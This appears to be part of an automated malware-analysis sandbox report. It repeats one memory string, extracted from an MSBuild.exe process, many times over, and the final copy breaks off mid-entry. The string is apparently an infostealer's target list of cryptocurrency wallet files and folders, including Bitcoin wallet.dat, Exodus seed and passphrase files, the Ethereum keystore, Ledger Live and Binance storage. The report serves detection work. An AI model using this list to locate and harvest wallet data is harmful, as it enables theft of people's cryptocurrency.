Source: MSBuild.exe, 00000002.00000002.2517585992.000000000159A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000002.00000002.2517585992.000000000159A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000002.00000002.2517585992.000000000159A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000002.00000002.2517585992.000000000159A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000002.00000002.2517585992.000000000159A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000002.00000002.2517585992.000000000159A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000002.00000002.2517585992.000000000159A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000002.00000002.2517585992.000000000159A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000002.00000002.2517585992.000000000159A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000002.00000002.2517585992.000000000159A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000002.00000002.2517585992.000000000159A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000002.00000002.2517585992.000000000159A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia 